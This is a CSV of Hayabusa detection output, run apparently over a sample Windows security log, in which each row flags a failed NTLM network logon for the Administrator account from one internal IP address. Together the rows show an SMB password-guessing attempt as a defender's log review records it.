2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.304 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.748 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.211 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.685 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.133 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:16.623 
